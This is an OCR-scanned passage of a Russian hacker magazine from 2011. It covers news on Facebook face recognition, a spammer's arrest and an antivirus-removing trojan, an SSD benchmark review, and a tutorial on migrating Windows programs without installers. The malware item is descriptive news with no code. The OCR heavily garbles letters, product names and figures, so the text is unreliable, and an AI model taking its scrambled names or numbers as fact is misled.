времени научится автоматически распознавать лица пользователей на фотоснимках. Какэто будет выглядеть? 
После загрузки фото РасеЬоок автоматически выделит на снимках лица людей. Чтобы «узнать» их, система 
просканирует в поисках соответствий все фотографии и аватары друзей пользователя. При этом РасеЬоок будет 
опираться на уже проставленные кснимкам теги: если человекотмечен на большом количестве фото, «узнать» 
его будетзначительно проще. Завершив поиски, РасеЬоок покажет пользователю результаты проделанной 
работы. Решение, кого отмечать на фото, а кого нет, будет принимать сам юзер. Предвидя, что многим это но- 
вовведение может не понравиться, в РасеЬоок, которую уже и такдостали обвинениями в нарушении частной 
жизни, предусмотрели возможность запретить распознавание своего лица. Для этого достаточно будет поста- 
вить соответствующую галочку в настройках приватности. 




ЧЕЛОВЕК - СПАМЕРСКАЯ ИМПЕРИЯ 



В начале ноября 2010 года в СШАбыл арестован 23-летний гражданин Российс- 
кой Федерации Олег Николаенко. Согласно данным ФБР, этот парень настоящий 
король спамеров — он умудрялся рассылать до трети всего мирового спама, а это 
порядка 10 млрд писем вдень! Такихзапредельных показателей емуудалось до- 
биться за счет использования ботнета, известного под именем Меда-Б, в который 
входило какминимум полмиллиона компьютеров. Зараженные машины ежедневно 
рассылалитонны нежелательной корреспонденции, предлагая купить по дешевке 
якобы фирменные часы, липовые справки и рецепты, «левые» лекарственные 
средства и многое другое. На след спам-рекордсмена правоохранительные органы 
вышли через его «коллег». Еще в 2009 году властям СШАудалось поймать двух 
спамеров: американца Джоди Смита и австралийца Л енса Аткинсона. «Федералы» Лі 
также сумели отследить денежные переводы в размере $459 000, сделанные Ат- ^ ^ 
кинсоном из Новой Зеландии. Вскоре, в ходе допроса, спамеры и сами сознались, 
что головной офис, с которым они работали, располагается в Москве и управляется 
одним человеком, скрывающимся под ником ОосепЕ Агенты ФБРдаже смогли 
получить письма с двух аккаунтов на Отаіі, который использовал Николаенко. 
Дальнейшее было деломтехники — парня арестовали в Лас-Вегасе, когда он 
прилетел в США на автомобильное шоу. Сейчас спамер находится в американской 
тюрьме, так как в освобождении под залог ему было отказано. Николаенко грозит до 
трех леттюрьмы или штраф в размере $250 000. 



» 6оодІе открыл магазин по продаже электронных книг. 

Более 3 миллионов платных и бесплатных книжек уже доступны по 
адресу Ьоокз.доодІе.сот/еЬоокз. 



ТРОЯНЕЦ С ФУНКЦИЕЙ УДАЛЕНИЯ АНТИВИРУСОВ 
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Специалисты антивирусных компаний предуп- 
реждают о новом трое, который как в старые 
добрые времена расчищаетсебе «поле деятель- 
ности», удаляя с пользовательских компьютеров 



антивирусное ПО. Малварь распространяется в 
виде исполняемого файла, подцепить который 
можно, если искать в Сети личные данные 
пользователей «ВКонтакте». В и рус усыпляет 
бдительность юзера, открывая окно Проводни- 
ка, якобы с базой данных «ВКонтакте», а сам тем 
временем устанавливается в систему и ищет 
антивирусы. Позавершении поиска трой уводит 
систему в ребут, загружает ѴѴіп б оѵѵз в безопас- 
ном режиме и из-под него аккуратно удаляет 
многие популярные антивирусы (большинство 
вендоров уже поправили уязвимости, которые 
использовала эта малварь]. В случае удачного 



удаления «конкурента» вирус снова перезаг- 
ружает компьютер, и в игру вступает винлокер 
Тго]ап.ѴѴіпІоск. 2477, требующий 295 рублей за 
разблокировку системы. Что особенно инте- 
ресно, если провести разблокировку и якобы 
освободить систему, хитрый трой сам примется 
эмулировать работу убитого антивируса ! Для 
это го и с п о л ьзу ется уже Тго] а п . Ра кеа Іе іі . 1 9 448 , 
который прикидывается именнотем антиви- 
русом, который ранее стоял на компьютере 
пользователя. Чтобы юзер не заметил подмены, 
продумано все: отпривычногозначка втрее до 
имитации интерфейса почившего антивиря. 
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ТЕСТИРОВАНИЕ 330-НАКОПИТЕЛЕЙ 



© Несмотря на все возрастающее количество герц, байт, шейдеров 
и конвейеров во всеми нами любимых железках, ничего принципиально 
нового в них давно не появлялось. Него нельзя сказать об области 
хранения данных. 830-накопители - это настоящий прорыв: 
устройства, построенные на в корне отличных от Н00 технологиях. 



Технологии 

Появились550-накопители не вчера и не позавчера, а ажв 1978 году, 
с легкой руки компании 5іогадеТгек. В 1995 году другая компания, М- 
Вузіетз, показала миру550-девайс на флеш-памяти. Дело двигалось 
и, в 2008 годууже третий игрок, Міхоп ВіюгадеТесЬпоІоду, доказал, что 
550-устройству покорны скорости 260 и 240 Мб/с для чтения и записи 
соответственно. Чем же 550 отличается отНОО? Различаются они при- 
нципиально. Можно сказать, на генном уровне. В 550 нет движущихся 
механических частей, по сути это — набор микросхем, который не шумит 
и не таксильно греется. Крометого, 550 существенно быстрее и не 
зависят от фрагментарности. На данный момент главный их недостаток 
— очень высокая цена. А крометого, счастливые владельцы твердотель- 
ных накопителей заметили, что когда их диски забиты, то скорость резко 
падает. Дело тут в особенностях архитектуры 550-устройств, которая 
состоит из многоуровневых ячеек, каждая из которых можетхранитьдва 
бита информации. Из шестнадцати тысяч таких ячеексостоит страни- 
ца, 128 страниц являются блоком в 51 2 Кб, а 1 024 блока уже составляют 
массив размером 512 Мб. Асамое главное заключается втом, что при ми- 



нимальном размерезаписываемыхданных в 4 Кб, стереть можнотолько 
512 Кб. В итоге получается некий аналогфрагментации в НОО. Таким 
образом, при заполнении накопителя более чем на 75% освобождать 
новые блоки становится сложнее, и скорость работы падает. Для реше- 
ния вопроса была придумана технология ТРІМ, которая помогает диску 
сразу обнулять ячейки и освобождать блоки для записи. Эта функция 
55й постоянно совершенствуется, и нетакдавно компания 5апбРогсе 
представила новую архитектуру ОигаСІазз. Максимальный объем такого 
девайса составит полтерабайта, интерфейсом выбран 5АТА III. Такие 
устройства будут отличаться повышенными скоростью, надежностью и 
долговечностью. 

Методика тестирования 

Для того, чтобы понять, что каждый из накопителей представляет собой 
в плане производительности, мы использовали тестовую утилиту Сгузіаі 
ОізкМагк 2.2 и дисковый тест из пакета РСМагкѴапІаде. Всетесты про- 
водились в двух режимах: на пустом диске и заполненном на 80%, дабы 
приблизить 55й креальнымусловиям работы. 
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ТЕСТИРУЕМОГО 

ОБОРУДОВАНИЯ 

АРАТА 3596 
СОКЗАІШѴАѴ128 
ШТЕІ.Х25-М 62 
ШТЕЬХ25-М62Х2 РАШ О 
КІЫ63Т0Ы 330Ы0Ж Ѵ+ 128 
КІЫ63Т0Ы 330Ы0Ж Ѵ+ 512 



& 6 ^ 



* . - ^ 



ТЕСТОВЫЙ СТЕНД: 

ПРОЦЕССОР: АМО РНЕИОМ II Х6 1090Т (3.2 ГГЦ) 
СИСТЕМНАЯ ПЛАТА: АЗЦЗ М4А896Т0 РРО 
ПАМЯТЬ: КШ63Т0И йОРЗ-ІЗЗЗ КѴКІЗЗЗОЗМ 4 ГБ 
ВИДЕОПЛАТА: ЗАРРНІРЕ РАОЕОИ НО 5870 1ГБ 
% БП: АТХЕМНАИСЕ600ВТ 
^ ОПЕРАЦИОННАЯ СИСТЕМА: ѴѴШ00ѴѴЗ 7 НОМЕ РРЕМШМ 



5$Р 






АРАТА 

5596 



Согеаіг Ыоѵа 
Ѵ128 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

СКОРОСТЬ ЧТЕНИЯ: до 250 Мб/с 
СКОРОСТЬ ЗАПИСИ: до 180 Мб/с 
ПОРТЫ: $АТА II, І^В 2.0 
КЭШ-ПАМЯТЬ: 128 Мб 
ОБЪЕМ: 128 Гб 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

СКОРОСТЬ ЧТЕНИЯ: до 270 Мб/с 
СКОРОСТЬ ЗАП ИСИ: до 1 95 М б/с 
ПОРТЫ: 5АТА II 
КЭШ-ПАМЯТЬ: 64 Мб 
ОБЪЕМ: 128 Гб 



□ □ 



□ □□ 



+ + 



От всех остальныхучастниковтестирования АОАТА5596 отличает- 
ся наличием ІІ5В-порта. С одной стороны, это плюс, повышающий 
универсальность устройства: его можно использовать не только как 
внутренний, постоянный, ноикаквнешний накопитель. С другой 
стороны, делать это можно только в случае крайней необходимости, 
так как потенциальная скорость передачи данных будетограничена 
возможностями интерфейса 115В. Кроме дополнительного разъема, диск 
может похвастаться поддержкой команд ТРІМ. Что касается скоростных 
характеристик, то АОАТА 5596 (несмотря нато, что не выбился в лидеры] 
во всехтестах показал результаты выше среднего. Учитывая его цену, 
можно сказать, что соотношение цены и качества у него очень высокое. 



Компания Согзаіг известна своими быстрыми мобильными накопителя- 
ми, поэтому кее 550-девайсу мы отнеслись весьма внимательно. И, по 
большому счету, Согзаіг ІЧоѵа VI 28 оправдал наши ожидания. Эта модель 
построена на базе контроллера Іпбіііпх ВагеЬоС В нашихтестахданный 
диск показал высокие результаты, особенно отличившись в РСМагк 
Ѵапіаде и при испытании на скоростьлинейного чтения. Стоит отметить, 
что команды ТРІМ не забыты производителем, и Согзаіг ІЧоѵа VI 28 их 
поддерживает. А компания-вендор, поддерживая свое реноме, упакова- 
ла в коробку не только устройство и инструкцию, а еще и переходникдля 
его установки в разъем 3.5, что весьма дальновидно, таккакпока не все 
корпуса имеют слоты для 550-накопителей. 



Никаких«персональных» недостатков диска мы не нашли, его минус это 
характерно высокая сегодня для всех 550-накопителей цена. 



Втакихтестах, какскорость записи блоков размером 4 и 512 Кб на запол 
ненный диск, быстродействие упало весьма существенно, в связи с чем 
мы сделали выводо некоторой завышенности цены на данный диск. 
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ІпТеІ 

Х25-М 62 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

СКОРОСТЬ ЧТЕНИЯ: до 250 Мб/с 
СКОРОСТЬ ЗАПИСИ: до 70 Мб/с 
ПОРТЫ: 5АТА II 
КЭШ-ПАМЯТЬ: 32 Мб 
ОБЪЕМ: 160 Гб 

■■■■■■■■□□ 

+ 

Компания Іпіеі отличилась в нашемтесте, представив I пТеІ Х25- М 62 
— единственный в обзоре дискемкостью 160 Гб. До установки втвой 
системный блок он находится в объемной коробке, соседствуя с наклей- 
кой, переходником для установки устройства в 3.5-разъем и диском, 
на котором находится 550 ТооІЬох — специальная фирменная утилита, 
предназначенная для оптимизации работы диска. Кстати, нетолько 
упаковка, но и корпусдиска вызываетуважение: цельнометаллический, 
с прокладкой по периметру. Говоря о скорости работы, нужно отметить 
хорошие результаты ІпІеІХ25-М 62, продемонстрированные при дейс- 
твиях с малыми объемами информации. 

Что касается скорости линейной записи, то тут все не оченьхорошо. 
Точнее, совсем плохо — по этому параметру I пГеІ Х25- М 62 находится на 
последнем месте в тесте. 



ІпіеІ 

Х25-М 62 х2 РАЮ О 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

СКОРОСТЬ ЧТЕНИЯ: до 500 Мб/с 
СКОРОСТЬ ЗАПИСИ: до 140 Мб/с 
ПОРТ: 5АТА 11x2 
КЭШ-ПАМЯТЬ: 32 Мб х2 
ОБЪЕМ: 320 Гб 

■■■■■■■■■□ 

+ 

Несмотря на всю свою инновационность и непохожесть на НОО, 550- 
накопители это, прежде всего, хранилища информации, поэтому ихточно 
также, как и обычныежесткие диски, можно объединить в РАЮ-массив, 
получив все причитающиеся от та кого действия плюшки. Объединив в 
РАЮ- массив уровня 0 два диска ІпІеІХ25-М 62, мы получили почти двук- 
ратный ростскорости линейного чтения и записи. Также существенно 
выросла скорость при работе с 512 Кб блоками. 

Минусы у решения тоже есть. Во-первых, за стоимость системного блока 
ты получишь всего 320 Гб объема, что по сегодняшним меркам крайне 
мало. Нехватитни на что. В конфигурации РАЮ 0 нети речи о надежнос- 
ти, а для того, чтобы смотреть фильмы и слушать музыку, такая скорость 
не нужна. Такчто практическая ценность данной конфигурации весьма 
сомнительна, разве что в синтетическихтестах баллы будут высокие. 

А на деле все быстро, конечно, но дорого и не очень надежно. 
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ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 



СКОРОСТЬ ЧТЕНИЯ: до 230 Мб/с 
СКОРОСТЬ ЗАПИСИ: до 180 Мб/с 



СКОРОСТЬ ЧТЕНИЯ: до 230 Мб/с 
СКОРОСТЬ ЗАПИСИ: до 180 Мб/с 



ПОРТ: 5АТАІІ 
КЭШ-ПАМЯТЬ: 128 Мб 



ПОРТ: 5АТА II 
КЭШ-ПАМЯТЬ: 128 Мб 



ОБЪЕМ: 128 Гб 



ОБЪЕМ: 512 Гб 



□ 



ВНЕ КОНКУРСА 



+ 

Всегда получаешьудовольствие, когда, открывая коробку сустройством, 
видишьтам нетолько сам девайс, но и всякие приятные дополнения к 
нему. Понятно, что ты за нихзаплатил, они не бесплатны, но все равно. 
Вот и КіпдзТоп ззсІІ\ІОѴѴѴ+ относится именно ктаким устройствам. В 
комплект поставки входит 5АТА- кабель и переходнике тоІех-5АТА, а 
также рек, внутрь которого ты установишь этот накопитель и получишь 
внешний диск с интерфейсом 115 В. Работает девайс весьма шустро, 
скорости линейного чтения и записи у него весьма неплохие. Также 
порадовала более высокая, чем у многихучастников, скорость работы с 
малыми блоками. 



+ 

Какты уже, наверное, понял, одной из основных проблем большинства 
современных550-накопителей является их относительно малый объем. 
Это устройство от Кіпдзіюп — наглядное подтверждение того, что увели- 
чение объема никоим образом не является технологической проблемой. 
Полтерабайта —это нормальный размер, на который можнозаписать 
кучу всего интересного, нужного и полезного. Кстати, все диски серии 
Кіпдзіюп ззсІІ\ІОѴѴѴ+ можно приобрести в двух комплектациях: одна 
описана выше, а вторая включает в себя только сам диск. Накопитель 
поддерживает набор команд ТРІМ, а его скоростные показатели практи- 
чески не отличаются от аналогичных у Кіпдзіюп 55СІІ\ІОѴѴѴ+ 1 28 Гб. 



Ксожалению, каким бы ни был хорошим комплект поставки, все в него 
включить невозможно, поэтому и в этой коробке отсутствует переходник 
для установки устройства в 3.5-отсек. В тестах из комплекта РСМагк 
Ѵапіюде были сильные проседания. 



Из минусов разве что скорость работы с блоками по 4 Кб у него пониже. 
Само собой разумеется, что главный недостаток да иного накопителя — 
это его непомерная цена, за которую можно купить полноценный ПКсо 
всеми необходимыми девайсами. Да и три 550-накопителя по 128 Гб от 
Кіпдзіюп обойдутся тебе дешевле. 



Выводы 

Быстрые 55 Б- на ко пите л и нам очень понравились — надеемся, 
что скоро они станут доступнее. Сегодня награду «Выбор редак- 



ции» получил Іпіеі Х25-М С2, титул «Лучшая покупка» достался 
Кіпдзіюп ззсИЧОѴѴ Ѵ+. А для богатых эстетов мы рекомендуем 
повнимательнее присмотреться кустройствам под грифом «Вне 
конкурса». ~і~ 
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РЕВВІІЛЛ 



РСМагк, ѴѴіпсюѵѵз Оетепаег. Мб/с 



Кіпдзіоп ззсШОѴѴ Ѵ+ 5126В 
Кіпдзіоп ззсІЫОѴѴ Ѵ+1286В 
Іпіеі Х25-М 62 1 60 6Ь х2 РАШ 0 
Іпіеі Х25-М 62 160 6Ь 
Согзаіг VI 28 128 68 
АРАТА 3596 128 6Ь 




РСМагк, \Л/іпс1оѵѵ5 Ѵізіа зТагТир, Мб/с 



Кіпдзіоп ззіІІШ Ѵ+5126В 
Кіпдзіоп ззсІШѴ+ 1286В 
Іпіеі Х25-М 62 1 60 6Ь х2 ВАШ 0 
Іпіеі Х25-М 62 1 60 6Ь 
Согзаіг Ѵ128 128 6Ь 
АРАТА 3596 1 28 6Ь 



200 



■ ІоасІ 

80% 

■ Сіеап 



400 



Накопители Кіпдзіоп немного впереди всех 



Видимо, скоро ѴѴіпсІоѵѵзу всех будет грузиться быстрее 



^ ш 



РСМагк, ѴѴіпсІоѵѵз Месііа Сепіег, Мб/с 



РСМагЦ, Арріісаііоп Іоасііпд, Мб/с 



Кіпдзіоп ззсіиот Ѵ+5126В 
Кіпдзіоп 55СІШѴ+ 1286В 
Іпіеі Х25-М 62 1 60 6Ь х2 ВАШ 0 
Іпіеі Х25-М 62 160 68 
Согзаіг VI 28 128 68 
АРАТА 3596 128 68 




О 200 

Вданномтесте хорошо показал себя диск от Согзаіг 



■ І_оасІ 
80% 

■ Сіеап 



400 



Кіпдзіоп 55ІИШѴ+ 51 26В 
Кіпдзіоп ззДООѴѴ Ѵ+ 1 28 6В 
Іпіеі Х25-М 6216068x2 КАІ00 
Іпіеі Х25-М 62 160 68 
СогзаігѴ128 128 68 
АРАТА 3596 128 68 




■ І_оас1 
80% 

■ Сіеап 



О 100 200 300 

Наш массив показывает фантастический рост скоростных 



показателей 



СгузІаЮ&кМагк, 5ес|иегтНаІ геасі, Мб/с 



Кіпдзіоп ЗЗСІИОѴѴ Ѵ+ 5126В 
Кіпдзіоп ззШѴ-ь 1286В 
Іпіеі Х25-М 62 1 60 68 х2 ВАШ 0 
Іпіеі Х25-М 62 160 6Ь 
Согзаіг VI 28 128 68 
АРАТА 3596 128 68 

Все почти равны 




600 



СгузТаЮізкМагк, 5ес|иеп1іаІ ѵѵгііе, Мб/с 



І_оасі 

80% 

Сіеап 



І_оасі 

80% 

Сіеап 



Кіпдзіоп зз^ОѴѴ Ѵ+ 5126В 
Кіпдзіоп ззсШОѴѴ Ѵ+ 1286В 
ІпІеІХ25-М 62 1 60 68 х2 ВАШ 0 
ІпІеІХ25-М 62 160 68 
Согзаіг VI 28 128 68 
АРАТА 3596 128 68 

Хорошо видны достоинства и недостатки каждого устройства 



СгузТаЮізкМагк, Рапсіот геасі 4КВ, Мб/с 



Кіпдзіоп ззсШОѴѴ Ѵ+ 5126В 
Кіпдзіоп ззсШОѴІІ Ѵ+ 1 28 6В 
Іпіеі Х25-М 62 1 60 68 х2 ВАШ 0 
Іпіеі Х25-М 62 160 68 
Согзаіг VI 28 1 28 68 
АРАТА 3596 128 68 



80% 




О 10 20 30 



Накопитель АРАТА 8592 рывком выходите лидеры 



СгузГаЮізкМагк, Рапсіот ѵѵгйе 4КВ, Мб/с 



Кіпдзіоп ззгіШ Ѵ+ 5126В 
Кіпдзіоп ззсІІШ Ѵ+ 1 28 6В 
ІпІеІХ25-М 62160 68x2 КАІ00 
Іпіеі Х25-М 62 160 68 
Согзаіг Ѵ128 128 68 
АРАТА 5596 128 68 




Іпіеі и ВАШ — братья навек 



► 016 



ХАКЕР 02 /145/ 201 1 





ЗАКАЗ 6 ИПЕ ТОО ПО ТЕЛЕФОН* Ж Ж 

Сонсект.сш Ь44 2222 



РАДИО 



сколимпиискииі 

начало в 19:00 



ПРЕДСТАВЛЯЕТ 




ошѳсредши щзрѳсзэсмя 
вшззшсая шгаосасао 






АЛИСА, КОРОЛЬ И ШУТ, КАЛИНОВ МОСТ 
МЕЛЬНИЦА, НАЙК БОРЗОВ, СЕРЬГА 
ВЯЧЕСЛАВ БУТУСОВ & Ю-ПИТЕР... 
ДАЛЬШЕ - БОЛЬШЕ! 

Постоянно обновляемая информация об участниках фестиваля - на сайте пагіте.ш 



оеклома 







■ ■ Николай «МОМ а Ну» Нежинский тогіаНу(сИгопЬги, Леонид «дгаит» Шигаревский І.зЫдагеѵзкіугадтаіІ.сот 




Рііе: Х.ехе (2 оі 2) 
БреесІ: 363 КВ/$ 
Зіаіиз: Ресеіѵіпд... 
^ЕІарзесІ Тіте: 0:00:19 
эіпіпд Тіте: 0:00:51 



> СІѴСІ 

На дискеты сможешь 
найти необходимые 
для переноса про- 
граммы, инструменты 
и вспомогательные 
сценарии 



Сиггепі Рііе: 



Оѵегаіі Ргодгезз: 




4.388 КВ оі 22.959 КВ (19%) 



ЕСЛИ НЕТ 
ИНСТАЛЛЯТОРА... 



Переносим приложения ѴѴіпсІоѵѵз 
беі дистрибутива 

о Часто возникают ситуации, когда программа, установленная на 
одном компьютере, должна непременно оказаться на другой машине. 
Причем инсталлятора нет, простого копирования файлов не хватает, 
а человек, который ставил программу, куда-то пропал вместе с 
дистрибутивом. 



В случае с редким или самописным софтом такая проблема случается 
сплошь и рядом. Практически каждая отдельно взятая контора может 
похвастаться, что какой-то местный кудесник-программист наколотил 
две-три тысячи строк кода, создавая очередную программу отчетности 
или ЕПР-систему. И все идет хорошо, пока этот компьютерный гуру 
не потеряется. Стандартного инсталлятора нет, простое копирование 
папки с программой не помогает, а программу срочно нужно устано- 
вить еще на одну машину. Кажется, пора начинать рвать на себе воло- 
сы? Но это не вариант для компьютерной нечисти! :) 



Что переносить? 

Итак, самый главный вопрос: что переносить кроме папки с програм- 
мой? Условно все необходимое можно разбить на три пункта: 

1. Файлы, к которым обращается программа. 

2 . Ветки реестра, к которым обращается программа. 

3. Среда выполнения. 

Если с пониманием первых двух пунктов проблем нет, то насчет тре- 
тьего стоит сделать уточнение. Под средой выполнения здесь пони- 
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Плагин «Рііеіггіо» добавил вкладку «Асгіѵех / ОСХ». 
Обычно ЕХЕ/011 файлы такой чести не удостаиваются 

маются базы данных, драйвера устройств (псевдоустройств], имено- 
ванные каналы (ІЧатесІ Рірез], мэйлслоты, СОМ/АсІіѵеХ компоненты 
и так далее. То есть, все, с чем работает программа (и что предостав- 
лено сторонним софтом, а не операционной системой] через стан- 
дартные интерфейсы ѴѴі псіоѵѵз — будь то сеть, ІРС или тому подобное. 
Среда является самым проблемным компонентом при переносе, и 
именно из-за среды приходится заморачиваться, чтобы ОС на обеих 
машинах совпадали. 

Какие файлы и ветки реестра 
переносить? 

Господа, давайте дружно поднимем бокалы с кофе, выпьем и почтим 
память безвременно ушедших утилит- мониторов І\ІТ Рііетоп и І\ІТ 
Редтоп, которые отслеживали обращения любого процесса к файлам 
и ключам реестра соответственно. Злой гений Марка Руссиновича 
безжалостно аннигилировал их... а потом воссоздал из пепла в 
одном мощном и полезном инструменте. Встречайте, Ргосезз Мопііог. 
Именно эта тулза будет основным оружием переноса и поможет нам 
разобраться, какие файлы использует программа и к каким ключам в 
реестре обращается. Для этого нам понадобятся две функции: Збоѵѵ 
Педізігу Асйѵііу и Збоѵѵ Рііе Зузіет Асбѵііу. 

Итак, открывай РгосМоп, запускай переносимую софтину и дождись, 
пока она полностью загрузится. Затем ступай в РгосМоп, отключи 
логирование, найди нужную программу (по имени исполняемого 
файла], жми правой кнопкой по записи в столбце Ргосезз ІЧате и 
выбирай I псіисіе ‘ЗирегРгод.ехе’, где ЗирегРгод.ехе — это исходное 
приложение для переноса. Ты увидишь, что Ргосезз Мопііог отсеял 
все события, связанные с другими процессами. Можно было бы ана- 
лизировать все в уме, отслеживая события, которые появляются в 
Ргосезз Мопііог, но мы поступим иначе. Для удобства сохраним лог 
всех обращений в файл. Для этого нажимай «Рііе -> Баѵе...». В окне 
сохранения опцию «Еѵепіз Іо заѵе» выставляй в «Еѵепіз сіізріауесі 
изіпд сиггепі ІіІІег»(чекбокс «Аізо і псіисіе ргоііііпд еѵепіз» должен 
быть включен], а «Еогтаі» выбирай «Сотта-Зерагаіесі Ѵаіиез 
(СЗѴ]». Сохрани куда-нибудь Еодіііе.сзѵ и можешь заглянуть внутрь. 
Испугался? :] 

Разобраться в этой помойке без помощи парсера сложно. Чтобы упро- 
стить задачу, я, когда сам занимался подобным переносом, набросал 
два Регі-скрипта (ищи их на диске]. Положи эти скрипты в папку, где 
был сохранен Еодіііе.сзѵ (или сразу сохраняй лог в папку к скриптам]. 
Теперь запускай рагзе.рЕ Этот скрипт отпарсит іод-файл и создаст еще 
два лога: Іііе.іод будет содержать уникальные обращения к файлам и 
папкам, гед.іод —уникальные обращения к веткам реестра. 

Отделяем мух от котлет 

Не торопись запускать второй скрипт. Сначала рекомендую отсеять 
явно левые записи из гед.іод. Такие ветки реестра, как НКЕМ/Зоііѵѵаге 
или НКСП/ІпІегІасе являются чисто системными, поэтому на новую 




Могучий Ргосезз МопНог 




^ . ■ 



При запуске .рі файла перлу передается флаг «-С» 
(работа с ІІМСООЕ'ом) 

машину их импортировать не имеет смысла (в худшем случае можно 
испортить систему]. Удаляем. Сильно тут не лютуй, а то выкинешь 
что-то, что имеет отношение к программе, которую переносим. После 
этого можно с чистым сердцем запускать ехрогЕрІ. Скрипт пошуршит и 
создаст в папке кучу РЕС-файлов (их можно импортировать на целевой 
системе] + папку зибсііг. Далее необходимо проанализировать содержа- 
ние Нед-файлов, напрячь голову и отсортировать файлы на три группы: 

• Нужен программе; 

• Не нужен программе; 

• На дополнительное изучение. 

Сортируя файлы, не забывай редактировать абсолютные (полные] пути 
до компонентов ЮЕЕ-библиотек, файлов настроек и прочего), если 
найдешь. Так мы получим РЕС-файлы, которые необходимо импорти- 
ровать на целевой машине. 

Теперь по поводу файлов. В папке зибсііг скрипт воссоздал дерево 
обращений к файлам таким образом: 

зибсііг 

С (буква диска) 

Ргодгаш Рііез 

...и так далее , до файлов включительно 

Непосредственный перенос 

На новой машине скопируй папку с программой в СЛРгодгат Еііез 
(к примеру). Импортируй ключи реестра, которые ты определил в 
группу «Нужен программе». Из папки зибсііг восстанови структуру 
файлов и каталогов, отсутствующих в системе, на которую выпол- 
няется перенос. Надеюсь, ты понимаешь, что системные файлы и 
библиотеки заменять не надо. Поэтому при переносе файлов нужно 
быть очень осторожным. Обязательно обращай внимание, где рас- 
полагается перемещаемый файл — проведи аналогию с перемен- 
ными окружения (изучи вывод команды «зеі» в консоли]. Просмотри 
содержимое каждого файла, который, как тебе кажется, не является 
системным. Поправь значения опций, в которых задается полный 
путь до каких-либо компонентов, если найдешь файл(ы] настроек. 
Если о защите системных библиотек ѴѴіпсІоѵѵз хоть как-то позабо- 
тится 5ЕС (Зузіет Еііе Сбескег), то в случае реестра такой помощи 
ждать не приходится. Поэтому при импортировании веток реестра с 
рабочей машины нужно быть вдвойне осторожным. Причем, как и в 
случае с файлами настроек, придется корректировать пути в строко- 
вых параметрах. 

Зарегистрируй СОМ-компоненты — их легко определить по наличию 
нескольких экспортируемых функций (ОІІПедізІегБегѵег, например]. 
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Два абсолютно левых ключа — ОЕІГГЕ их! 



РегІ и ІІІЧІССЮЕ 



Чтобы при воссоздании дерева папок скрипт прописал милые 
сердцу символы национального алфавита, надо сообщить ему, что 
он будет иметь дело с ІЛЧІССЮЕ’ом. Просто измени запись в реестре 
так, как показано на рисунке. 



Тем, кто забыл: регистрация производится командой гедзѵг32 
сотропепІ.сИІ, где сотропепТсШ является СОМ-сервером (кстати, 
СОМ-сервер может находиться и внутри ехе-файла]. Ценителям 
Тоіаі Соттапбег будет приятно, что для их любимца есть Іізіег- 
плагин, который на раз определяет СОМ/АсбѵеХ. 

Если программа использует какие-то специфические технологии, 
необходима дополнительная настройка. Скажем, в случае с исполь- 
зованием ВБЕ(ВогІапсІ БаІаЬазе Епдіпе) необходимо внести соответ- 
ствующие изменения у БаІаЭоигсе’ов, которые использует программа. 
После этого остается только проинсталлировать и настроить среду, 
которая нужна нашему приложению (если нужна]. Стандартные ком- 
поненты наподобие сервера БД ты установишь сам. Перенос среды 
должен быть легче всего, поскольку для серверов БД есть нормаль- 
ные инсталляторы. Установить драйвер можно специальной утилитой, 
а зарегистрировать СОМ-сервер еще проще. 

Перенос драйверов 

А что делать, если программа работает с драйвером, единственный 
установщик которого потерян вместе с іпзіаіі.ехе? Да и как вообще 
определить, что программа работает с драйвером? Какой-либо спе- 
циальной тулзы я не нашел, поэтому воспользуемся ОНуйбд. Чтобы 
работать через ОеѵісеІ оСопЕгоІ (через эту системную функцию драй- 
веру устройств отправляются разные команды), сначала необходимо 
открыть созданное устройство через символическую ссылку вызовами 
СгеаІіеРі ІеА/СгеаІеРі ІеѴѴ. От этого и будем плясать. 

Загрузи программу в отладчик. Прямо на точке входа в окне дизас- 
семблера жми <01x1+6 >, вводи СгеаІеЕіІеА и нажимай <0К>. Мы 
попали в начало функции открытия файла. На этом месте нажимай 
<5Ы1і:+Б4> или в меню по правой кнопке «Вгеакроіпі Сопбібопаі 
Іод». В открывшемся окне в поле «Ехргеззіоп» вписывай БѴѴОРВ 
РТЕ Б5:[Е5Р+4] — по этому адресу лежит указатель на открываемый 
файл. В комобоксе «йесобе ѵаіие оі ехргеззіоп аз» выбирай «Роіпіег 
Іо А5СІІ зігіпд» (для юникод-версии соответственно — «Роіпіег Іо 
И N ІСО О Е зіхіпд»]. Радио-кнопку <Бод ѵаіие оі ехргеззіоп> выставляй 
в «Аіѵѵауз». Остальные опции оставь по умолчанию. Нажимай <0К> и 
запускай программу. 

Очень вероятно, что придется имитировать ее реальное исполь- 
зование, поскольку мы не знаем, в какой момент может произой- 
ти обращение к драйверу. Открывай в ОІІуБЬд лог (комбинация 
клавиш < СЕгІ-і- Б> ] и ищи подсвеченные строки, начинающиеся 
с СОИИ. В кавычках будет указан файл, и если он начинается с 
\\.\ — считай, что это наш драйвер. С помощью утилиты ѴѴіпОЬ] 
(кстати, написанной опять же Руссиновичем] выясни настоящее 
имя устройства. Оно должно выглядеть как ВеѵісеѴВеѵЫате. 
Посредством той же ѴѴіпОЬ] убедись, что на другом компьютере 
этого устройства нет. 

Настал черед поиска самого файла драйвера. Большинство драйве- 
ров располагаются в %5узІетРооІ%\5узІет32\Вгіѵегз. Перейди в эту 
папку и ищи 14 N ІСО Б Е-строку имени устройства (Веѵісе\ОеѵМате]. 
Если файла с такой строкой нет, то открывай «Сервис Менеджер». 

Там ищи все драйвера, которые располагаются по нестандартному 
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Программа «Сервис Менеджер» позволяет легко уста- 
новить драйвер 



пути — искомая строка должна быть в одном из них. Этот же «Сервис 
Менеджер» поможет тебе перенести драйвер на другой компьютер 
(сделай скриншоты настроек, пропиши зависимости и так далее]. 
Утилита хорошая, но, увы, не совсем корректно инсталлирует драй- 
вера. Поэтому, после того, как установишь свой драйвер, выполни 
следующие действия: найди в редакторе реестра ветку \НКЕУ_ЮСАЕ_ 
МАСНІМЕ\5у5Іет\СиггепіСопІго15еі\5егѵісез\выбранное_имя_драй- 
вера и удали ключи «Огоир» и «ОЬіесіЫате» в этом разделе. Если 
ключи не удалить, то менеджер при запуске драйвера будет выдавать 
ошибку, сообщая, что указан некорректный путь, хотя путь тут как бы и 
не причем. 

Подводные камни 

Когда ты считаешь, что все перенес — запускай программу. С вероят- 
